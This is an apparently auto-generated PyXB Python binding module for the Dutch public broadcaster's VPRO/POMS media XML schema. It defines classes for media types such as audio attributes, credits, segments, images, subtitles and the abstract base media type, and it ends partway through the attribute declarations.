# Complex type {urn:vpro:media:2009}audioAttributesType with content type ELEMENT_ONLY
class audioAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}audioAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'audioAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 534, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}numberOfChannels uses Python identifier numberOfChannels
__numberOfChannels = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels'), 'numberOfChannels', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009numberOfChannels', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6), )
numberOfChannels = property(__numberOfChannels.value, __numberOfChannels.set, None, None)
# Element {urn:vpro:media:2009}audioCoding uses Python identifier audioCoding
__audioCoding = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'audioCoding'), 'audioCoding', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009audioCoding', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6), )
audioCoding = property(__audioCoding.value, __audioCoding.set, None, None)
# Element {urn:vpro:media:2009}language uses Python identifier language
__language = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'language'), 'language', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009language', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6), )
language = property(__language.value, __language.set, None, None)
_ElementMap.update({
__numberOfChannels.name() : __numberOfChannels,
__audioCoding.name() : __audioCoding,
__language.name() : __language
})
_AttributeMap.update({
})
_module_typeBindings.audioAttributesType = audioAttributesType
Namespace.addCategoryObject('typeBinding', 'audioAttributesType', audioAttributesType)
# Complex type {urn:vpro:media:2009}creditsType with content type ELEMENT_ONLY
class creditsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}creditsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'creditsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 542, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}person uses Python identifier person
__person = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'person'), 'person', '__urnvpromedia2009_creditsType_urnvpromedia2009person', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8), )
person = property(__person.value, __person.set, None, None)
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_creditsType_urnvpromedia2009name', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8), )
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
__person.name() : __person,
__name.name() : __name
})
_AttributeMap.update({
})
_module_typeBindings.creditsType = creditsType
Namespace.addCategoryObject('typeBinding', 'creditsType', creditsType)
# Complex type {urn:vpro:media:2009}segmentsType with content type ELEMENT_ONLY
class segmentsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}segmentsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 623, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}segment uses Python identifier segment
__segment = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segment'), 'segment', '__urnvpromedia2009_segmentsType_urnvpromedia2009segment', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6), )
segment = property(__segment.value, __segment.set, None, None)
_ElementMap.update({
__segment.name() : __segment
})
_AttributeMap.update({
})
_module_typeBindings.segmentsType = segmentsType
Namespace.addCategoryObject('typeBinding', 'segmentsType', segmentsType)
# Complex type {urn:vpro:media:2009}imagesType with content type ELEMENT_ONLY
class imagesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}imagesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'imagesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 655, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:shared:2009}image uses Python identifier image
__image = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_shared, 'image'), 'image', '__urnvpromedia2009_imagesType_urnvproshared2009image', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 8, 2), )
image = property(__image.value, __image.set, None, None)
_ElementMap.update({
__image.name() : __image
})
_AttributeMap.update({
})
_module_typeBindings.imagesType = imagesType
Namespace.addCategoryObject('typeBinding', 'imagesType', imagesType)
# Complex type {urn:vpro:media:2009}groupTableType with content type ELEMENT_ONLY
class groupTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}groupTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 674, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}group uses Python identifier group
__group = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'group'), 'group', '__urnvpromedia2009_groupTableType_urnvpromedia2009group', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2), )
    group = property(__group.value, __group.set, None, '\n        A group collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n      ')
_ElementMap.update({
__group.name() : __group
})
_AttributeMap.update({
})
_module_typeBindings.groupTableType = groupTableType
Namespace.addCategoryObject('typeBinding', 'groupTableType', groupTableType)
# Complex type {urn:vpro:media:2009}locationTableType with content type ELEMENT_ONLY
class locationTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 704, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}location uses Python identifier location
__location = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'location'), 'location', '__urnvpromedia2009_locationTableType_urnvpromedia2009location', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6), )
location = property(__location.value, __location.set, None, None)
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_locationTableType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
_ElementMap.update({
__location.name() : __location,
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
})
_module_typeBindings.locationTableType = locationTableType
Namespace.addCategoryObject('typeBinding', 'locationTableType', locationTableType)
# Complex type {urn:vpro:media:2009}scheduleEventsType with content type ELEMENT_ONLY
class scheduleEventsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 724, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_scheduleEventsType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
_ElementMap.update({
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
})
_module_typeBindings.scheduleEventsType = scheduleEventsType
Namespace.addCategoryObject('typeBinding', 'scheduleEventsType', scheduleEventsType)
# Complex type {urn:vpro:media:2009}locationsType with content type ELEMENT_ONLY
class locationsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 803, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}location uses Python identifier location
__location = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'location'), 'location', '__urnvpromedia2009_locationsType_urnvpromedia2009location', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6), )
location = property(__location.value, __location.set, None, None)
_ElementMap.update({
__location.name() : __location
})
_AttributeMap.update({
})
_module_typeBindings.locationsType = locationsType
Namespace.addCategoryObject('typeBinding', 'locationsType', locationsType)
# Complex type {urn:vpro:media:2009}availableSubtitleType with content type EMPTY
class availableSubtitleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}availableSubtitleType with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'availableSubtitleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 831, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute language uses Python identifier language
__language = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'language'), 'language', '__urnvpromedia2009_availableSubtitleType_language', pyxb.binding.datatypes.string)
__language._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 833, 4)
__language._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 833, 4)
language = property(__language.value, __language.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_availableSubtitleType_type', pyxb.binding.datatypes.string)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 834, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 834, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__language.name() : __language,
__type.name() : __type
})
_module_typeBindings.availableSubtitleType = availableSubtitleType
Namespace.addCategoryObject('typeBinding', 'availableSubtitleType', availableSubtitleType)
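# Usage sketch (editorial addition): availableSubtitleType has EMPTY content, so an
# instance consists only of the two optional string attributes; the values below are
# hypothetical examples, not values mandated by the schema.
#
#   sub = availableSubtitleType(language='nl', type='CAPTION')
#   sub.language, sub.type            # plain strings, no enumeration to validate against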
# Complex type {urn:vpro:media:2009}baseMediaType with content type ELEMENT_ONLY
class baseMediaType (pyxb.binding.basis.complexTypeDefinition):
"""
This is the abstract base entity for programs, groups and segments. Actually these objects are very similar and share most properties.
"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'baseMediaType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 218, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}crid uses Python identifier crid
__crid = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'crid'), 'crid', '__urnvpromedia2009_baseMediaType_urnvpromedia2009crid', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6), )
crid = property(__crid.value, __crid.set, None, '\n A crid (content reference identifier) is a reference to an entity in another system. E.g. a crid like\n crid://broadcast.radiobox2/335793 refers to a broadcast with id 335793 in Radiobox. A crid must be a valid\n URI starting with "crid://". Crids must be unique, but they can be made up freely. It is a good idea to use\n a logical structure which can easily be associated with another system. Any POMS object can have zero or\n more crids. They can refer to different systems, but a POMS object could also actually represent more than\n one entity in a remote system.\n ')
# Element {urn:vpro:media:2009}broadcaster uses Python identifier broadcaster
__broadcaster = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'broadcaster'), 'broadcaster', '__urnvpromedia2009_baseMediaType_urnvpromedia2009broadcaster', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6), )
broadcaster = property(__broadcaster.value, __broadcaster.set, None, '\n One or more broadcasters can be the owner of a POMS media object. This information is meta information about the object, but it is also used\n for assigning write access to the object in the POMS backend to employees of these given broadcasting companies.\n ')
# Element {urn:vpro:media:2009}portal uses Python identifier portal
__portal = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'portal'), 'portal', '__urnvpromedia2009_baseMediaType_urnvpromedia2009portal', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6), )
    portal = property(__portal.value, __portal.set, None, "\n                Optionally 'portals' can be assigned to a media object. Portals are also 'owners', and employees can also work for a certain portal.\n                This is because some portals are shared by several broadcasting companies.\n            ")
# Element {urn:vpro:media:2009}exclusive uses Python identifier exclusive
__exclusive = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'exclusive'), 'exclusive', '__urnvpromedia2009_baseMediaType_urnvpromedia2009exclusive', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6), )
exclusive = property(__exclusive.value, __exclusive.set, None, "\n Besides having portals, which mainly indicates where the object originates, a media object can also be assigned 'portal restrictions'.\n If a media object has any portal restrictions the media object may only be shown on these portals.\n ")
# Element {urn:vpro:media:2009}region uses Python identifier region
__region = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'region'), 'region', '__urnvpromedia2009_baseMediaType_urnvpromedia2009region', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6), )
region = property(__region.value, __region.set, None, "\n Media with a geo restriction can only be played in the indicated region (NL, BENELUX, WORLD). This\n restriction doesn't apply to the metadata of the media object. It only applies to the actual playable content.\n ")
# Element {urn:vpro:media:2009}title uses Python identifier title
__title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'title'), 'title', '__urnvpromedia2009_baseMediaType_urnvpromedia2009title', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6), )
title = property(__title.value, __title.set, None, '\n A media object has one or more titles. All titles have a type (MAIN, SUB etc.) and an owner (BROADCASTER, MIS etc.).\n The combination of type and owner is always unique for a particular media object, so a media object cannot\n have multiple titles of the same type and owner. Titles are sorted in order of the textualTypeEnum and the in order\n of ownerTypeEnum when published, so the first title in a published document will be a title owned by BROADCASTER of type\n MAIN, if that title exists.\n ')
# Element {urn:vpro:media:2009}description uses Python identifier description
__description = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'description'), 'description', '__urnvpromedia2009_baseMediaType_urnvpromedia2009description', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6), )
description = property(__description.value, __description.set, None, '\n Optional descriptions for the media object. Descriptions have an owner and a type, and are ordered just like titles.\n ')
# Element {urn:vpro:media:2009}genre uses Python identifier genre
__genre = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'genre'), 'genre', '__urnvpromedia2009_baseMediaType_urnvpromedia2009genre', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6), )
genre = property(__genre.value, __genre.set, None, None)
# Element {urn:vpro:media:2009}tag uses Python identifier tag
__tag = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'tag'), 'tag', '__urnvpromedia2009_baseMediaType_urnvpromedia2009tag', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6), )
tag = property(__tag.value, __tag.set, None, None)
# Element {urn:vpro:media:2009}intentions uses Python identifier intentions
__intentions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'intentions'), 'intentions', '__urnvpromedia2009_baseMediaType_urnvpromedia2009intentions', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6), )
intentions = property(__intentions.value, __intentions.set, None, None)
# Element {urn:vpro:media:2009}targetGroups uses Python identifier targetGroups
__targetGroups = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetGroups'), 'targetGroups', '__urnvpromedia2009_baseMediaType_urnvpromedia2009targetGroups', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6), )
targetGroups = property(__targetGroups.value, __targetGroups.set, None, None)
# Element {urn:vpro:media:2009}geoLocations uses Python identifier geoLocations
__geoLocations = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'geoLocations'), 'geoLocations', '__urnvpromedia2009_baseMediaType_urnvpromedia2009geoLocations', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6), )
geoLocations = property(__geoLocations.value, __geoLocations.set, None, None)
# Element {urn:vpro:media:2009}topics uses Python identifier topics
__topics = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'topics'), 'topics', '__urnvpromedia2009_baseMediaType_urnvpromedia2009topics', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6), )
topics = property(__topics.value, __topics.set, None, None)
# Element {urn:vpro:media:2009}source uses Python identifier source
__source = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'source'), 'source', '__urnvpromedia2009_baseMediaType_urnvpromedia2009source', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6), )
source = property(__source.value, __source.set, None, None)
# Element {urn:vpro:media:2009}country uses Python identifier country
__country = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'country'), 'country', '__urnvpromedia2009_baseMediaType_urnvpromedia2009country', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6), )
country = property(__country.value, __country.set, None, None)
# Element {urn:vpro:media:2009}language uses Python identifier language
__language = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'language'), 'language', '__urnvpromedia2009_baseMediaType_urnvpromedia2009language', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6), )
language = property(__language.value, __language.set, None, None)
# Element {urn:vpro:media:2009}isDubbed uses Python identifier isDubbed
__isDubbed = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'isDubbed'), 'isDubbed', '__urnvpromedia2009_baseMediaType_urnvpromedia2009isDubbed', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6), )
isDubbed = property(__isDubbed.value, __isDubbed.set, None, None)
# Element {urn:vpro:media:2009}availableSubtitles uses Python identifier availableSubtitles
__availableSubtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles'), 'availableSubtitles', '__urnvpromedia2009_baseMediaType_urnvpromedia2009availableSubtitles', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6), )
availableSubtitles = property(__availableSubtitles.value, __availableSubtitles.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_baseMediaType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}releaseYear uses Python identifier releaseYear
__releaseYear = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'releaseYear'), 'releaseYear', '__urnvpromedia2009_baseMediaType_urnvpromedia2009releaseYear', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6), )
releaseYear = property(__releaseYear.value, __releaseYear.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_baseMediaType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Element {urn:vpro:media:2009}credits uses Python identifier credits
__credits = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'credits'), 'credits', '__urnvpromedia2009_baseMediaType_urnvpromedia2009credits', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6), )
credits = property(__credits.value, __credits.set, None, None)
# Element {urn:vpro:media:2009}award uses Python identifier award
__award = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'award'), 'award', '__urnvpromedia2009_baseMediaType_urnvpromedia2009award', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6), )
award = property(__award.value, __award.set, None, None)
# Element {urn:vpro:media:2009}descendantOf uses Python identifier descendantOf
__descendantOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'descendantOf'), 'descendantOf', '__urnvpromedia2009_baseMediaType_urnvpromedia2009descendantOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6), )
descendantOf = property(__descendantOf.value, __descendantOf.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_baseMediaType_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}ageRating uses Python identifier ageRating
__ageRating = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ageRating'), 'ageRating', '__urnvpromedia2009_baseMediaType_urnvpromedia2009ageRating', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6), )
ageRating = property(__ageRating.value, __ageRating.set, None, None)
# Element {urn:vpro:media:2009}contentRating uses Python identifier contentRating
__contentRating = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'contentRating'), 'contentRating', '__urnvpromedia2009_baseMediaType_urnvpromedia2009contentRating', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6), )
contentRating = property(__contentRating.value, __contentRating.set, None, None)
# Element {urn:vpro:media:2009}email uses Python identifier email
__email = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'email'), 'email', '__urnvpromedia2009_baseMediaType_urnvpromedia2009email', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6), )
email = property(__email.value, __email.set, None, None)
# Element {urn:vpro:media:2009}website uses Python identifier website
__website = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'website'), 'website', '__urnvpromedia2009_baseMediaType_urnvpromedia2009website', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6), )
website = property(__website.value, __website.set, None, None)
# Element {urn:vpro:media:2009}twitter uses Python identifier twitter
__twitter = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'twitter'), 'twitter', '__urnvpromedia2009_baseMediaType_urnvpromedia2009twitter', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6), )
twitter = property(__twitter.value, __twitter.set, None, None)
# Element {urn:vpro:media:2009}teletext uses Python identifier teletext
__teletext = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'teletext'), 'teletext', '__urnvpromedia2009_baseMediaType_urnvpromedia2009teletext', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6), )
teletext = property(__teletext.value, __teletext.set, None, None)
# Element {urn:vpro:media:2009}prediction uses Python identifier prediction
__prediction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'prediction'), 'prediction', '__urnvpromedia2009_baseMediaType_urnvpromedia2009prediction', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6), )
prediction = property(__prediction.value, __prediction.set, None, None)
# Element {urn:vpro:media:2009}locations uses Python identifier locations
__locations = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'locations'), 'locations', '__urnvpromedia2009_baseMediaType_urnvpromedia2009locations', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6), )
locations = property(__locations.value, __locations.set, None, None)
# Element {urn:vpro:media:2009}relation uses Python identifier relation
__relation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'relation'), 'relation', '__urnvpromedia2009_baseMediaType_urnvpromedia2009relation', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6), )
relation = property(__relation.value, __relation.set, None, None)
# Element {urn:vpro:media:2009}images uses Python identifier images
__images = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'images'), 'images', '__urnvpromedia2009_baseMediaType_urnvpromedia2009images', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6), )
images = property(__images.value, __images.set, None, None)
# Attribute mid uses Python identifier mid
__mid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mid'), 'mid', '__urnvpromedia2009_baseMediaType_mid', _module_typeBindings.midType)
__mid._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 316, 4)
__mid._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 316, 4)
mid = property(__mid.value, __mid.set, None, None)
# Attribute avType uses Python identifier avType
__avType = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'avType'), 'avType', '__urnvpromedia2009_baseMediaType_avType', _module_typeBindings.avTypeEnum, required=True)
__avType._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 317, 4)
